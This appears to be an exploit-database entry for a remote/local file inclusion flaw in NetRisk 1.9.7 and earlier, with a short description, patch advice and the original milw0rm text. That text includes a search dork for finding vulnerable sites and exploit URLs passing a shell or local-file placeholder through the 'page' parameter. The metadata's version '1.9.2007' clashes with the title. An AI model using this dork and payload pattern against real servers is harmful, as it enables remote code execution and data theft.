NetRisk - exploit.company

vendor:

NetRisk

by:

S.W.A.T.

9.3

CVSS

HIGH

Remote/Local File Inclusion

CWE

Product Name: NetRisk

Affected Version From: 1.9.2007

Affected Version To: 1.9.2007

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

NetRisk <= 1.9.7 Remote/Local File Inclusion Vulnerability

A vulnerability exists in NetRisk version 1.9.7 and earlier which allows an attacker to include a remote file or a local file on the server. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. The maliciously crafted HTTP request contains a maliciously crafted parameter which is used to include a remote file or a local file on the server.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of NetRisk.

Source

Exploit-DB raw data:

#########################################################################
        NetRisk <= 1.9.7 Remote/Local File Inclusion Vulnerability      #
#########################################################################
AUTHOR     : S.W.A.T.							#
HOME       : http://svvat.ir					        #
Download   : http://phprisk.org/netrisk_1.9.7.zip                       #
#########################################################################
DorKs      : inurl:index.php?page=gamebrowser                           #
#########################################################################
## EXPLOIT :                                                            #
http://server.com/Path/index.php?page=[SHELL]                           #
http://server.com/Path/index.php?page=[-LFI-]                           #
#########################################################################
## GREETZ  : Str0ke - Dj7xpl - DarKLiFe - NazNazi - XmorsTEAM           #
#########################################################################
## Note    : BaBayE NET For Ever :-h =; :(( :((                         #
#########################################################################
========================================================================#
||  ##    ##   ##           ##########   #######     ########         ||#
||   ##  ##    ##########   ##########   ##   ##     ##               ||#
||    ####     ##########   ##      ##   #######     ########         ||#
||    ####     ##  ##  ##   ##      ##   #######           ##         ||#
||   ##  ##    ##  ##  ##   ##########   ##    ##          ##         ||#
||  ##    ##   ##  ##  ##   ##########   ##     ##   ########         ||#
========================================================================#
#########################################################################
#								        #
#   BYE ALL MY FRIENDS OVER THE NET & EVERYTHING ON THE NET             #
#								        #
#########################################################################

# milw0rm.com [2008-01-04]